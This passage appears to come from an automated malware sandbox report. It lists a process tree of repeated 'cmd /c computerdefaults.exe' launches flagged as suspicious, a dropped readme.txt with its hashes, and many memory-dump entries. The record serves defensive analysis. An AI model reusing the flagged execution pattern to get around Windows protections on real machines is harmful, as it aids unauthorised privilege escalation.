- Process spawned unexpected child process
PID:4320
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4748

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4420
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4800

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4312
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4612

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4580

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
7d32d649569a5d31dc0f07bcd8ab9257

SHA1
86be38be6868574a9d0f578a9675741bb7e89c10

SHA256
dc168d8838f118fde046defcb39830cfd79bc4c5fb0d1d9172b0b3562b4df8ef

SHA512
86f9ddc06ecabaf693868ddb1b90f00a16b2249b3e8a7eb9b65895864c2bf11998984566ce9008a5b8aa61322b7393caf0504c57b8a5c071cc0a2241d43be4ab

Download Submit
memory/344-138-0x0000000000000000-mapping.dmp

Download
memory/352-142-0x0000000000000000-mapping.dmp

Download
memory/860-135-0x0000000000000000-mapping.dmp

Download
memory/916-157-0x0000000000000000-mapping.dmp

Download
memory/1000-131-0x0000000000000000-mapping.dmp

Download
memory/1064-149-0x0000000000000000-mapping.dmp

Download
memory/1188-139-0x0000000000000000-mapping.dmp

Download
memory/1412-134-0x0000000000000000-mapping.dmp

Download
memory/1476-152-0x0000000000000000-mapping.dmp

Download
memory/1764-140-0x0000000000000000-mapping.dmp

Download
memory/1792-145-0x0000000000000000-mapping.dmp

Download
memory/2156-150-0x0000000000000000-mapping.dmp

Download
memory/2272-151-0x0000000000000000-mapping.dmp

Download
memory/2352-143-0x0000000000000000-mapping.dmp

Download
memory/2420-133-0x0000000000000000-mapping.dmp

Download
memory/2560-154-0x0000000000000000-mapping.dmp

Download
memory/2592-153-0x0000000000000000-mapping.dmp

Download
memory/2620-130-0x000001FC1EA30000-0x000001FC1EA34000-memory.dmp

Filesize
16KB

Download
memory/2756-136-0x0000000000000000-mapping.dmp

Download
memory/2772-146-0x0000000000000000-mapping.dmp

Download
memory/3120-141-0x0000000000000000-mapping.dmp

Download
memory/3236-144-0x0000000000000000-mapping.dmp

Download
memory/3452-121-0x0000022446C10000-0x0000022446C11000-memory.dmp

Filesize
4KB

Download
memory/3452-129-0x0000022448C00000-0x0000022448C01000-memory.dmp

Filesize
4KB

Download
memory/3452-126-0x0000022448BD0000-0x0000022448BD1000-memory.dmp

Filesize
4KB

Download
memory/3452-118-0x0000022446AA0000-0x0000022446AA6000-memory.dmp

Filesize
24KB

Download
memory/3452-124-0x0000022448B90000-0x0000022448B91000-memory.dmp

Filesize
4KB

Download
memory/3452-127-0x0000022448BE0000-0x0000022448BE1000-memory.dmp

Filesize
4KB

Download
memory/3452-158-0x0000022449190000-0x0000022449191000-memory.dmp

Filesize
4KB

Download
memory/3452-128-0x0000022448BF0000-0x0000022448BF1000-memory.dmp

Filesize
4KB

Download
memory/3452-123-0x0000022448B80000-0x0000022448B81000-memory.dmp

Filesize
4KB

Download
memory/3452-122-0x0000022446C20000-0x0000022446C21000-memory.dmp

Filesize
4KB

Download
memory/3452-125-0x0000022448BA0000-0x0000022448BA1000-memory.dmp

Filesize
4KB

Download
memory/3452-120-0x0000022446C00000-0x0000022446C01000-memory.dmp

Filesize
4KB

Download
memory/3452-119-0x0000022446BF0000-0x0000022446BF1000-memory.dmp

Filesize
4KB

Download
memory/3732-148-0x0000000000000000-mapping.dmp

Download
memory/3792-156-0x0000000000000000-mapping.dmp

Download
memory/3884-137-0x0000000000000000-mapping.dmp

Download
memory/3956-155-0x0000000000000000-mapping.dmp

Download
memory/4044-147-0x0000000000000000-mapping.dmp

Download
memory/4232-159-0x0000000000000000-mapping.dmp

Download
memory/4244-160-0x0000000000000000-mapping.dmp

Download
memory/4276-161-0x0000000000000000-mapping.dmp

Download
memory/4492-162-0x0000000000000000-mapping.dmp

Download
memory/4580-163-0x0000000000000000-mapping.dmp

Download
memory/4612-164-0x0000000000000000-mapping.dmp

Download
memory/4628-165-0x0000000000000000-mapping.dmp

Download
memory/4644-166-0x0000000000000000-mapping.dmp

Download
memory/4660-167-0x0000000000000000-mapping.dmp

Download
memory/4676-168-0x0000000000000000-mapping.dmp

Download
memory/4748-169-0x0000000000000000-mapping.dmp

Download
memory/4800-170-0x0000000000000000-mapping.dmp

Download